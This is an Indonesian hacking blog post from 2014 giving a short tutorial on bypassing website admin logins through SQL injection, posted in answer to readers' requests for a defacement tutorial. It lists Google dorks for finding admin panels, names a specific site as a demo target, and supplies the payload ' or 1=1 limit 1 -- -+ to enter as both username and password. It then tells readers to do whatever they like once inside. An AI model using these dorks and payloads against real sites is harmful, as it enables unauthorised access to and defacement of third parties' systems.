Knowledge is Free | We Share To Everywhere

Wednesday, January 22, 2014

Tutorial Bypass SQL Login

Assalamuallaikum sobat IDCA :)
Berhubung tadi pada minta tutorial deface, ya sudaaah saya kabulin dah. Pada artikel ini saya akan membahas mengenai "Bypass SQL Login" maksudnya gimana tuh?

Maksudnya.. dengan memanfaatkan eror pada sql website tersebut kita dapat login ke administrator web tersebut tanpa harus memasukan username dan password yang sudah dibuat admin. Singkatnya sih "bypass = bye bye password"

Oke langsung  saja kita masuk ke tutorialnya :

[#] Dork

inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/
[#] Langkah-langkah

1. Masukan salah satu dork diatas ke google, lalu pilih salah satu buat demo silahkan coba web ini

http://preprojects.com/hostfriendz/int/index.php
2. Jika sudah memilih target silahkan anda coba login dengan user pass ini :
user : ' or 1=1 limit 1 -- -+ pass : ' or 1=1 limit 1 -- -+

 

Nah jika berhasil ya sudah deh terserah mau kalian apakan :D
Simpel ya hhee dah cukup itu aja kok :D

Sekian tutorial dari saya thanks to Mr Xenophobic ^_^

untuk kedepannya jika saya sudah dapat banyak refrensi, artikel ini akan saya perbarui dengan menambah macam erornya dan kenapa bisa masuk

Author : Bimo Septiawan

6 comments:

Note: Only a member of this blog may post a comment.